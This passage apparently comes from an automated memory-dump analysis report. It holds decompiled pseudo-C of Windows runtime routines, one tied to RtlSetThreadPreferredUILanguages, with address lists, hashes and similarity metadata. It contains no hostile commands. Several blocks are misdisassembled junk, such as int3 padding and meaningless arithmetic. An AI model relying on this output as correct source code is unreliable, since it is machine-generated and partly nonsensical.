                    									__ebx = __ebx + 0x16;
                    									__ebx = __ebx + __eax;
                    								}
                    								__eflags = __dl;
                    								if(__dl != 0) {
                    									__eax = 0x1558478;
                    									L80:
                    									_v32 = __eax;
                    								}
                    								goto L14;
                    							case 8:
                    								__eax =  *0x1556e58 & 0x0000ffff;
                    								__eax = ( *0x1556e58 & 0x0000ffff) + 2;
                    								L53:
                    								__ebx = __ebx + __eax;
                    								L14:
                    								_t331 = _t331 + 1;
                    								if(_t331 >= _v48) {
                    									goto L16;
                    								} else {
                    									_t320 = _v37;
                    									goto L1;
                    								}
                    								goto L108;
                    						}
                    					}
                    					L56:
                    					_t298 = 0x25;
                    					asm("int 0x29");
                    					asm("out 0x28, al");
                    					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t353;
                    					_t248 = _t247 + _t353;
                    					asm("daa");
                    					 *_t338 =  *_t338 + _t345;
                    					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t248;
                    					_t303 = _t298 - 0xfffffffffffffffd;
                    					 *0x1f014926 =  *0x1f014926 + _t248;
                    					_pop(_t288);
                    					 *((intOrPtr*)(_t248 +  &_a1530200389)) =  *((intOrPtr*)(_t248 +  &_a1530200389)) + _t320;
                    					 *_t320 =  *_t320 + _t248;
                    					 *((intOrPtr*)(_t303 + 1)) =  *((intOrPtr*)(_t303 + 1)) - _t303;
                    					 *_t248 =  *_t248 - 0x49;
                    					_t341 = _t338 + _t338;
                    					asm("daa");
                    					_t304 = _t303 - 1;
                    					 *_t341 =  *_t341 + _t288;
                    					 *((intOrPtr*)(_t304 + 1)) =  *((intOrPtr*)(_t304 + 1)) - _t304;
                    					_t342 = _t341 - 1;
                    					 *((intOrPtr*)(_t304 + 1)) =  *((intOrPtr*)(_t304 + 1)) - _t304;
                    					asm("daa");
                    					_pop(_t289);
                    					 *((intOrPtr*)(_t248 + _t288 +  &_a1546912069)) =  *((intOrPtr*)(_t248 + _t288 +  &_a1546912069)) + _t341 - 1;
                    					_t355 = _t353 + _t304 - 1;
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_push(0x20);
                    					_push(0x153ff00);
                    					E014BD08C(_t289, _t333, _t342);
                    					_v44 =  *[fs:0x18];
                    					_t334 = 0;
                    					 *_a24 = 0;
                    					_t290 = _a12;
                    					__eflags = _t290;
                    					if(_t290 == 0) {
                    						_t252 = 0xc0000100;
                    					} else {
                    						_v8 = 0;
                    						_t343 = 0xc0000100;
                    						_v52 = 0xc0000100;
                    						_t254 = 4;
                    						while(1) {
                    							_v40 = _t254;
                    							__eflags = _t254;
                    							if(_t254 == 0) {
                    								break;
                    							}
                    							_t310 = _t254 * 0xc;
                    							_v48 = _t310;
                    							__eflags = _t290 -  *((intOrPtr*)(_t310 + 0x1441664));
                    							if(__eflags <= 0) {
                    								if(__eflags == 0) {
                    									_t269 = E014AE5C0(_a8,  *((intOrPtr*)(_t310 + 0x1441668)), _t290);
                    									_t355 = _t355 + 0xc;
                    									__eflags = _t269;
                    									if(__eflags == 0) {
                    										_t343 = E014E51BE(_t290,  *((intOrPtr*)(_v48 + 0x144166c)), _a16, _t334, _t343, __eflags, _a20, _a24);
                    										_v52 = _t343;
                    										break;
                    									} else {
                    										_t254 = _v40;
                    										goto L62;
                    									}
                    									goto L70;
                    								} else {
                    									L62:
                    									_t254 = _t254 - 1;
                    									continue;
                    								}
                    							}
                    							break;
                    						}
                    						_v32 = _t343;
                    						__eflags = _t343;
                    						if(_t343 < 0) {
                    							__eflags = _t343 - 0xc0000100;
                    							if(_t343 == 0xc0000100) {
                    								_t306 = _a4;
                    								__eflags = _t306;
                    								if(_t306 != 0) {
                    									_v36 = _t306;
                    									__eflags =  *_t306 - _t334;
                    									if( *_t306 == _t334) {
                    										_t343 = 0xc0000100;
                    										goto L76;
                    									} else {
                    										_t322 =  *((intOrPtr*)(_v44 + 0x30));
                    										_t256 =  *((intOrPtr*)(_t322 + 0x10));
                    										__eflags =  *((intOrPtr*)(_t256 + 0x48)) - _t306;
                    										if( *((intOrPtr*)(_t256 + 0x48)) == _t306) {
                    											__eflags =  *(_t322 + 0x1c);
                    											if( *(_t322 + 0x1c) == 0) {
                    												L106:
                    												_t343 = E01492AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
                    												_v32 = _t343;
                    												__eflags = _t343 - 0xc0000100;
                    												if(_t343 != 0xc0000100) {
                    													goto L69;
                    												} else {
                    													_t334 = 1;
                    													_t306 = _v36;
                    													goto L75;
                    												}
                    											} else {
                    												_t259 = E01476600( *(_t322 + 0x1c));
                    												__eflags = _t259;
                    												if(_t259 != 0) {
                    													goto L106;
                    												} else {
                    													_t306 = _a4;
                    													goto L75;
                    												}
                    											}
                    										} else {
                    											L75:
                    											_t343 = E01492C50(_t306, _a8, _t290, _a16, _a20, _a24, _t334);
                    											L76:
                    											_v32 = _t343;
                    											goto L69;
                    										}
                    									}
                    									goto L108;
                    								} else {
                    									E0147EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    									_v8 = 1;
                    									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                    									_t343 = _a24;
                    									_t266 = E01492AE4( &_v36, _a8, _t290, _a16, _a20, _t343);
                    									_v32 = _t266;
                    									__eflags = _t266 - 0xc0000100;
                    									if(_t266 == 0xc0000100) {
                    										_v32 = E01492C50(_v36, _a8, _t290, _a16, _a20, _t343, 1);
                    									}
                    									_v8 = _t334;
                    									E01492ACB();
                    								}
                    							}
                    						}
                    						L69:
                    						_v8 = 0xfffffffe;
                    						_t252 = _t343;
                    					}
                    					L70:
                    					return E014BD0D1(_t252);
                    				}
                    				L108:
                    			}

                    0x01492616
                    0x01492619
                    0x01492619
                    0x0149261e
                    0x00000000
                    0x01492624
                    0x01492627
                    0x01492627
                    0x00000000
                    0x00000000
                    0x014d5b1f
                    0x00000000
                    0x00000000
                    0x01492894
                    0x0149289b
                    0x0149289d
                    0x014928a1
                    0x014d5b2b
                    0x014d5b2e
                    0x014d5b2e
                    0x014928a7
                    0x014928a9
                    0x014d5b04
                    0x014d5b09
                    0x014d5b09
                    0x014d5b09
                    0x00000000
                    0x00000000
                    0x014d5b35
                    0x014d5b3c
                    0x014928fb
                    0x014928fb
                    0x014926cc
                    0x014926cc
                    0x014926d0
                    0x00000000
                    0x014926d2
                    0x014926d2
                    0x00000000
                    0x014926d2
                    0x00000000
                    0x00000000
                    0x014925fe
                    0x0149292d
                    0x0149292f
                    0x01492930
                    0x01492935
                    0x01492938
                    0x0149293c
                    0x0149293e
                    0x01492940
                    0x01492944
                    0x01492947
                    0x01492948
                    0x0149294e
                    0x01492950
                    0x01492958
                    0x0149295a
                    0x0149295d
                    0x01492960
                    0x01492962
                    0x01492963
                    0x01492964
                    0x01492966
                    0x01492969
                    0x0149296a
                    0x0149296e
                    0x01492972
                    0x01492974
                    0x0149297c
                    0x0149297e
                    0x0149297f
                    0x01492980
                    0x01492981
                    0x01492982
                    0x01492983
                    0x01492984
                    0x01492985
                    0x01492986
                    0x01492987
                    0x01492988
                    0x01492989
                    0x0149298a
                    0x0149298b
                    0x0149298c
                    0x0149298d
                    0x0149298e
                    0x0149298f
                    0x01492990
                    0x01492992
                    0x01492997
                    0x014929a3
                    0x014929a6
                    0x014929ab
                    0x014929ad
                    0x014929b0
                    0x014929b2
                    0x014d5c80
                    0x014929b8
                    0x014929b8
                    0x014929bb
                    0x014929c0
                    0x014929c5
                    0x014929c6
                    0x014929c6
                    0x014929c9
                    0x014929cb
                    0x00000000
                    0x00000000
                    0x014929cd
                    0x014929d0
                    0x014929d9
                    0x014929db
                    0x014929dd
                    0x01492a7f
                    0x01492a84
                    0x01492a87
                    0x01492a89
                    0x014d5ca1
                    0x014d5ca3
                    0x00000000
                    0x01492a8f
                    0x01492a8f
                    0x00000000
                    0x01492a8f
                    0x00000000
                    0x014929e3
                    0x014929e3
                    0x014929e3
                    0x00000000
                    0x014929e3
                    0x014929dd
                    0x00000000
                    0x014929db
                    0x014929e6
                    0x014929e9
                    0x014929eb
                    0x014929ed
                    0x014929f3
                    0x014929f5
                    0x014929f8
                    0x014929fa
                    0x01492a97
                    0x01492a9a
                    0x01492a9d
                    0x01492add
                    0x00000000
                    0x01492a9f
                    0x01492aa2
                    0x01492aa5
                    0x01492aa8
                    0x01492aab
                    0x014d5cab
                    0x014d5caf
                    0x014d5cc5
                    0x014d5cda
                    0x014d5cdc
                    0x014d5cdf
                    0x014d5ce5
                    0x00000000
                    0x014d5ceb
                    0x014d5ced
                    0x014d5cee
                    0x00000000
                    0x014d5cee
                    0x014d5cb1
                    0x014d5cb4
                    0x014d5cb9
                    0x014d5cbb
                    0x00000000
                    0x014d5cbd
                    0x014d5cbd
                    0x00000000
                    0x014d5cbd
                    0x014d5cbb
                    0x01492ab1
                    0x01492ab1
                    0x01492ac4
                    0x01492ac6
                    0x01492ac6
                    0x00000000
                    0x01492ac6
                    0x01492aab
                    0x00000000
                    0x01492a00
                    0x01492a09
                    0x01492a0e
                    0x01492a21
                    0x01492a24
                    0x01492a35
                    0x01492a3a
                    0x01492a3d
                    0x01492a42
                    0x01492a59
                    0x01492a59
                    0x01492a5c
                    0x01492a5f
                    0x01492a5f
                    0x014929fa
                    0x014929f3
                    0x01492a64
                    0x01492a64
                    0x01492a6b
                    0x01492a6b
                    0x01492a6d
                    0x01492a72
                    0x01492a72
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: PATH
                    • API String ID: 0-1036084923
                    • Opcode ID: 2cf39a31a97aaed49b9ac656f4e754bf2eb28690e0edbea8fd8404c32c2f39d8
                    • Instruction ID: 73482f204b1a5b2516c60f56aa29f119f442c4838d5aa52e2586321be016638e
                    • Opcode Fuzzy Hash: 2cf39a31a97aaed49b9ac656f4e754bf2eb28690e0edbea8fd8404c32c2f39d8
                    • Instruction Fuzzy Hash: 76C1A071E00219EBDF24DF99D890EAEBBB1FF58700F45406AE901BB360D774A946CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E0149FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                    				char _v5;
                    				signed int _v8;
                    				signed int _v12;
                    				char _v16;
                    				char _v17;
                    				char _v20;
                    				signed int _v24;
                    				char _v28;
                    				char _v32;
                    				signed int _v40;
                    				void* __ecx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t73;
                    				intOrPtr* _t75;
                    				signed int _t77;
                    				signed int _t79;
                    				signed int _t81;
                    				intOrPtr _t83;
                    				intOrPtr _t85;
                    				intOrPtr _t86;
                    				signed int _t91;
                    				signed int _t94;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t106;
                    				signed int _t108;
                    				signed int _t114;
                    				signed int _t116;
                    				signed int _t118;
                    				signed int _t122;
                    				signed int _t123;
                    				void* _t129;
                    				signed int _t130;
                    				void* _t132;
                    				intOrPtr* _t134;
                    				signed int _t138;
                    				signed int _t141;
                    				signed int _t147;
                    				intOrPtr _t153;
                    				signed int _t154;
                    				signed int _t155;
                    				signed int _t170;
                    				void* _t174;
                    				signed int _t176;
                    				signed int _t177;
                    
                    				_t129 = __ebx;
                    				_push(_t132);
                    				_push(__esi);
                    				_t174 = _t132;
                    				_t73 =  !( *( *(_t174 + 0x18)));
                    				if(_t73 >= 0) {
                    					L5:
                    					return _t73;
                    				} else {
                    					E0147EEF0(0x1557b60);
                    					_t134 =  *0x1557b84; // 0x77f07b80
                    					_t2 = _t174 + 0x24; // 0x24
                    					_t75 = _t2;
                    					if( *_t134 != 0x1557b80) {
                    						_push(3);
                    						asm("int 0x29");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_push(0x1557b60);
                    						_t170 = _v8;
                    						_v28 = 0;
                    						_v40 = 0;
                    						_v24 = 0;
                    						_v17 = 0;
                    						_v32 = 0;
                    						__eflags = _t170 & 0xffff7cf2;
                    						if((_t170 & 0xffff7cf2) != 0) {
                    							L43:
                    							_t77 = 0xc000000d;
                    						} else {
                    							_t79 = _t170 & 0x0000000c;
                    							__eflags = _t79;
                    							if(_t79 != 0) {
                    								__eflags = _t79 - 0xc;
                    								if(_t79 == 0xc) {
                    									goto L43;
                    								} else {
                    									goto L9;
                    								}
                    							} else {
                    								_t170 = _t170 | 0x00000008;
                    								__eflags = _t170;
                    								L9:
                    								_t81 = _t170 & 0x00000300;
                    								__eflags = _t81 - 0x300;
                    								if(_t81 == 0x300) {
                    									goto L43;
                    								} else {
                    									_t138 = _t170 & 0x00000001;
                    									__eflags = _t138;
                    									_v24 = _t138;
                    									if(_t138 != 0) {
                    										__eflags = _t81;
                    										if(_t81 != 0) {
                    											goto L43;
                    										} else {
                    											goto L11;
                    										}
                    									} else {
                    										L11:
                    										_push(_t129);
                    										_t77 = E01476D90( &_v20);
                    										_t130 = _t77;
                    										__eflags = _t130;
                    										if(_t130 >= 0) {
                    											_push(_t174);
                    											__eflags = _t170 & 0x00000301;
                    											if((_t170 & 0x00000301) == 0) {
                    												_t176 = _a8;
                    												__eflags = _t176;
                    												if(__eflags == 0) {
                    													L64:
                    													_t83 =  *[fs:0x18];
                    													_t177 = 0;
                    													__eflags =  *(_t83 + 0xfb8);
                    													if( *(_t83 + 0xfb8) != 0) {
                    														E014776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                    														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                    													}
                    													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                    													goto L15;
                    												} else {
                    													asm("sbb edx, edx");
                    													_t114 = E01508938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                    													__eflags = _t114;
                    													if(_t114 < 0) {
                    														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                    														E0146B150();
                    													}
                    													_t116 = E01506D81(_t176,  &_v16);
                    													__eflags = _t116;
                    													if(_t116 >= 0) {
                    														__eflags = _v16 - 2;
                    														if(_v16 < 2) {
                    															L56:
                    															_t118 = E014775CE(_v20, 5, 0);
                    															__eflags = _t118;
                    															if(_t118 < 0) {
                    																L67:
                    																_t130 = 0xc0000017;
                    																goto L32;
                    															} else {
                    																__eflags = _v12;
                    																if(_v12 == 0) {
                    																	goto L67;
                    																} else {
                    																	_t153 =  *0x1558638; // 0x0
                    																	_t122 = L014738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                    																	_t154 = _v12;
                    																	_t130 = _t122;
                    																	__eflags = _t130;
                    																	if(_t130 >= 0) {
                    																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                    																		__eflags = _t123;
                    																		if(_t123 != 0) {
                    																			_t155 = _a12;
                    																			__eflags = _t155;
                    																			if(_t155 != 0) {
                    																				 *_t155 = _t123;
                    																			}
                    																			goto L64;
                    																		} else {
                    																			E014776E2(_t154);
                    																			goto L41;
                    																		}
                    																	} else {
                    																		E014776E2(_t154);
                    																		_t177 = 0;
                    																		goto L18;
                    																	}
                    																}
                    															}
                    														} else {
                    															__eflags =  *_t176;
                    															if( *_t176 != 0) {
                    																goto L56;
                    															} else {
                    																__eflags =  *(_t176 + 2);
                    																if( *(_t176 + 2) == 0) {
                    																	goto L64;
                    																} else {
                    																	goto L56;
                    																}
                    															}
                    														}
                    													} else {
                    														_t130 = 0xc000000d;
                    														goto L32;
                    													}
                    												}
                    												goto L35;
                    											} else {
                    												__eflags = _a8;
                    												if(_a8 != 0) {
                    													_t77 = 0xc000000d;
                    												} else {
                    													_v5 = 1;
                    													L0149FCE3(_v20, _t170);
                    													_t177 = 0;
                    													__eflags = 0;
                    													L15:
                    													_t85 =  *[fs:0x18];
                    													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                    													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                    														L18:
                    														__eflags = _t130;
                    														if(_t130 != 0) {
                    															goto L32;
                    														} else {
                    															__eflags = _v5 - _t130;
                    															if(_v5 == _t130) {
                    																goto L32;
                    															} else {
                    																_t86 =  *[fs:0x18];
                    																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                    																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                    																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                    																}
                    																__eflags = _t177;
                    																if(_t177 == 0) {
                    																	L31:
                    																	__eflags = 0;
                    																	L014770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                    																	goto L32;
                    																} else {
                    																	__eflags = _v24;
                    																	_t91 =  *(_t177 + 0x20);
                    																	if(_v24 != 0) {
                    																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                    																		goto L31;
                    																	} else {
                    																		_t141 = _t91 & 0x00000040;
                    																		__eflags = _t170 & 0x00000100;
                    																		if((_t170 & 0x00000100) == 0) {
                    																			__eflags = _t141;
                    																			if(_t141 == 0) {
                    																				L74:
                    																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                    																				goto L27;
                    																			} else {
                    																				_t177 = E0149FD22(_t177);
                    																				__eflags = _t177;
                    																				if(_t177 == 0) {
                    																					goto L42;
                    																				} else {
                    																					_t130 = E0149FD9B(_t177, 0, 4);
                    																					__eflags = _t130;
                    																					if(_t130 != 0) {
                    																						goto L42;
                    																					} else {
                    																						_t68 = _t177 + 0x20;
                    																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                    																						__eflags =  *_t68;
                    																						_t91 =  *(_t177 + 0x20);
                    																						goto L74;
                    																					}
                    																				}
                    																			}
                    																			goto L35;
                    																		} else {
                    																			__eflags = _t141;
                    																			if(_t141 != 0) {
                    																				_t177 = E0149FD22(_t177);
                    																				__eflags = _t177;
                    																				if(_t177 == 0) {
                    																					L42:
                    																					_t77 = 0xc0000001;
                    																					goto L33;
                    																				} else {
                    																					_t130 = E0149FD9B(_t177, 0, 4);
                    																					__eflags = _t130;
                    																					if(_t130 != 0) {
                    																						goto L42;
                    																					} else {
                    																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                    																						_t91 =  *(_t177 + 0x20);
                    																						goto L26;
                    																					}
                    																				}
                    																				goto L35;
                    																			} else {
                    																				L26:
                    																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                    																				__eflags = _t94;
                    																				L27:
                    																				 *(_t177 + 0x20) = _t94;
                    																				__eflags = _t170 & 0x00008000;
                    																				if((_t170 & 0x00008000) != 0) {
                    																					_t95 = _a12;
                    																					__eflags = _t95;
                    																					if(_t95 != 0) {
                    																						_t96 =  *_t95;
                    																						__eflags = _t96;
                    																						if(_t96 != 0) {
                    																							 *((short*)(_t177 + 0x22)) = 0;
                    																							_t40 = _t177 + 0x20;
                    																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                    																							__eflags =  *_t40;
                    																						}
                    																					}
                    																				}
                    																				goto L31;
                    																			}
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t147 =  *( *[fs:0x18] + 0xfc0);
                    														_t106 =  *(_t147 + 0x20);
                    														__eflags = _t106 & 0x00000040;
                    														if((_t106 & 0x00000040) != 0) {
                    															_t147 = E0149FD22(_t147);
                    															__eflags = _t147;
                    															if(_t147 == 0) {
                    																L41:
                    																_t130 = 0xc0000001;
                    																L32:
                    																_t77 = _t130;
                    																goto L33;
                    															} else {
                    																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                    																_t106 =  *(_t147 + 0x20);
                    																goto L17;
                    															}
                    															goto L35;
                    														} else {
                    															L17:
                    															_t108 = _t106 | 0x00000080;
                    															__eflags = _t108;
                    															 *(_t147 + 0x20) = _t108;
                    															 *( *[fs:0x18] + 0xfc0) = _t147;
                    															goto L18;
                    														}
                    													}
                    												}
                    											}
                    											L33:
                    										}
                    									}
                    								}
                    							}
                    						}
                    						L35:
                    						return _t77;
                    					} else {
                    						 *_t75 = 0x1557b80;
                    						 *((intOrPtr*)(_t75 + 4)) = _t134;
                    						 *_t134 = _t75;
                    						 *0x1557b84 = _t75;
                    						_t73 = E0147EB70(_t134, 0x1557b60);
                    						if( *0x1557b20 != 0) {
                    							_t73 =  *( *[fs:0x30] + 0xc);
                    							if( *((char*)(_t73 + 0x28)) == 0) {
                    								_t73 = E0147FF60( *0x1557b20);
                    							}
                    						}
                    						goto L5;
                    					}
                    				}
                    			}
                    0x0149fbfa
                    0x00000000
                    0x0149fc00
                    0x0149fc00
                    0x0149fc03
                    0x00000000
                    0x0149fc09
                    0x0149fc09
                    0x0149fc0f
                    0x0149fc15
                    0x0149fc23
                    0x0149fc23
                    0x0149fc25
                    0x0149fc27
                    0x0149fc75
                    0x0149fc7c
                    0x0149fc84
                    0x00000000
                    0x0149fc29
                    0x0149fc29
                    0x0149fc2d
                    0x0149fc30
                    0x014dbf0f
                    0x00000000
                    0x0149fc36
                    0x0149fc38
                    0x0149fc3b
                    0x0149fc41
                    0x014dbf17
                    0x014dbf19
                    0x014dbf48
                    0x014dbf4b
                    0x00000000
                    0x014dbf1b
                    0x014dbf22
                    0x014dbf24
                    0x014dbf26
                    0x00000000
                    0x014dbf2c
                    0x014dbf37
                    0x014dbf39
                    0x014dbf3b
                    0x00000000
                    0x014dbf41
                    0x014dbf41
                    0x014dbf41
                    0x014dbf41
                    0x014dbf45
                    0x00000000
                    0x014dbf45
                    0x014dbf3b
                    0x014dbf26
                    0x00000000
                    0x0149fc47
                    0x0149fc47
                    0x0149fc49
                    0x0149fcb2
                    0x0149fcb4
                    0x0149fcb6
                    0x0149fcdc
                    0x0149fcdc
                    0x00000000
                    0x0149fcb8
                    0x0149fcc3
                    0x0149fcc5
                    0x0149fcc7
                    0x00000000
                    0x0149fcc9
                    0x0149fcc9
                    0x0149fccd
                    0x00000000
                    0x0149fccd
                    0x0149fcc7
                    0x00000000
                    0x0149fc4b
                    0x0149fc4b
                    0x0149fc4e
                    0x0149fc4e
                    0x0149fc51
                    0x0149fc51
                    0x0149fc54
                    0x0149fc5a
                    0x0149fc5c
                    0x0149fc5f
                    0x0149fc61
                    0x0149fc63
                    0x0149fc65
                    0x0149fc67
                    0x0149fc6e
                    0x0149fc72
                    0x0149fc72
                    0x0149fc72
                    0x0149fc72
                    0x0149fc67
                    0x0149fc61
                    0x00000000
                    0x0149fc5a
                    0x0149fc49
                    0x0149fc41
                    0x0149fc30
                    0x0149fc27
                    0x0149fc03
                    0x0149fbcd
                    0x0149fbd3
                    0x0149fbd9
                    0x0149fbdc
                    0x0149fbde
                    0x0149fc99
                    0x0149fc9b
                    0x0149fc9d
                    0x0149fcd5
                    0x0149fcd5
                    0x0149fc89
                    0x0149fc89
                    0x00000000
                    0x0149fc9f
                    0x0149fc9f
                    0x0149fca3
                    0x00000000
                    0x0149fca3
                    0x00000000
                    0x0149fbe4
                    0x0149fbe4
                    0x0149fbe4
                    0x0149fbe4
                    0x0149fbe9
                    0x0149fbf2
                    0x00000000
                    0x0149fbf2
                    0x0149fbde
                    0x0149fbcb
                    0x0149fbab
                    0x0149fc8b
                    0x0149fc8b
                    0x0149fc8c
                    0x0149fb80
                    0x0149fb72
                    0x0149fb5e
                    0x0149fc8d
                    0x0149fc91
                    0x0149fadf
                    0x0149fadf
                    0x0149fae1
                    0x0149fae4
                    0x0149fae7
                    0x0149faec
                    0x0149faf8
                    0x0149fb00
                    0x0149fb07
                    0x0149fb0f
                    0x0149fb0f
                    0x0149fb07
                    0x00000000
                    0x0149faf8
                    0x0149fadd

                    Strings
                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 014DBE0F
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                    • API String ID: 0-865735534
                    • Opcode ID: f50a75eda3c7499e9ce42ae20a98457e801d9b94a413c25b9b9bda08d88477df
                    • Instruction ID: 71048c476ae72936d64fa5d934a798572ee7b0d3557bf79224b90959b2327cdd
                    • Opcode Fuzzy Hash: f50a75eda3c7499e9ce42ae20a98457e801d9b94a413c25b9b9bda08d88477df
                    • Instruction Fuzzy Hash: ECA1F631B006468BEF21DF69C4607AABFA5FF59720F05456FD906CB7A1DB30D84A8790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E01462D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                    				signed char _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				signed int _v52;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr _t55;
                    				signed int _t57;
                    				signed int _t58;
                    				char* _t62;
                    				signed char* _t63;
                    				signed char* _t64;
                    				signed int _t67;
                    				signed int _t72;
                    				signed int _t77;
                    				signed int _t78;
                    				signed int _t88;
                    				intOrPtr _t89;
                    				signed char _t93;
                    				signed int _t97;
                    				signed int _t98;
                    				signed int _t102;
                    				signed int _t103;
                    				intOrPtr _t104;
                    				signed int _t105;
                    				signed int _t106;
                    				signed char _t109;
                    				signed int _t111;
                    				void* _t116;
                    
                    				_t102 = __edi;
                    				_t97 = __edx;
                    				_v12 = _v12 & 0x00000000;
                    				_t55 =  *[fs:0x18];
                    				_t109 = __ecx;
                    				_v8 = __edx;
                    				_t86 = 0;
                    				_v32 = _t55;
                    				_v24 = 0;
                    				_push(__edi);
                    				if(__ecx == 0x1555350) {
                    					_t86 = 1;
                    					_v24 = 1;
                    					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                    				}
                    				_t103 = _t102 | 0xffffffff;
                    				if( *0x1557bc8 != 0) {
                    					_push(0xc000004b);
                    					_push(_t103);
                    					E014A97C0();
                    				}
                    				if( *0x15579c4 != 0) {
                    					_t57 = 0;
                    				} else {
                    					_t57 = 0x15579c8;
                    				}
                    				_v16 = _t57;
                    				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                    					_t93 = _t109;
                    					L23();
                    				}
                    				_t58 =  *_t109;
                    				if(_t58 == _t103) {
                    					__eflags =  *(_t109 + 0x14) & 0x01000000;
                    					_t58 = _t103;
                    					if(__eflags == 0) {
                    						_t93 = _t109;
                    						E01491624(_t86, __eflags);
                    						_t58 =  *_t109;
                    					}
                    				}
                    				_v20 = _v20 & 0x00000000;
                    				if(_t58 != _t103) {
                    					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                    				}
                    				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                    				_t88 = _v16;
                    				_v28 = _t104;
                    				L9:
                    				while(1) {
                    					if(E01487D50() != 0) {
                    						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                    					} else {
                    						_t62 = 0x7ffe0382;
                    					}
                    					if( *_t62 != 0) {
                    						_t63 =  *[fs:0x30];
                    						__eflags = _t63[0x240] & 0x00000002;
                    						if((_t63[0x240] & 0x00000002) != 0) {
                    							_t93 = _t109;
                    							E014FFE87(_t93);
                    						}
                    					}
                    					if(_t104 != 0xffffffff) {
                    						_push(_t88);
                    						_push(0);
                    						_push(_t104);
                    						_t64 = E014A9520();
                    						goto L15;
                    					} else {
                    						while(1) {
                    							_t97 =  &_v8;
                    							_t64 = E0149E18B(_t109 + 4, _t97, 4, _t88, 0);
                    							if(_t64 == 0x102) {
                    								break;
                    							}
                    							_t93 =  *(_t109 + 4);
                    							_v8 = _t93;
                    							if((_t93 & 0x00000002) != 0) {
                    								continue;
                    							}
                    							L15:
                    							if(_t64 == 0x102) {
                    								break;
                    							}
                    							_t89 = _v24;
                    							if(_t64 < 0) {
                    								L014BDF30(_t93, _t97, _t64);
                    								_push(_t93);
                    								_t98 = _t97 | 0xffffffff;
                    								__eflags =  *0x1556901;
                    								_push(_t109);
                    								_v52 = _t98;
                    								if( *0x1556901 != 0) {
                    									_push(0);
                    									_push(1);
                    									_push(0);
                    									_push(0x100003);
                    									_push( &_v12);
                    									_t72 = E014A9980();
                    									__eflags = _t72;
                    									if(_t72 < 0) {
                    										_v12 = _t98 | 0xffffffff;
                    									}
                    								}
                    								asm("lock cmpxchg [ecx], edx");
                    								_t111 = 0;
                    								__eflags = 0;
                    								if(0 != 0) {
                    									__eflags = _v12 - 0xffffffff;
                    									if(_v12 != 0xffffffff) {
                    										_push(_v12);
                    										E014A95D0();
                    									}
                    								} else {
                    									_t111 = _v12;
                    								}
                    								return _t111;
                    							} else {
                    								if(_t89 != 0) {
                    									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                    									_t77 = E01487D50();
                    									__eflags = _t77;
